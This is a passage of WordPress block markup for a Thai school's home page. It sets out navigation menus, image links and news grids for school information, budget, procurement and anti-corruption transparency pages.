{\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 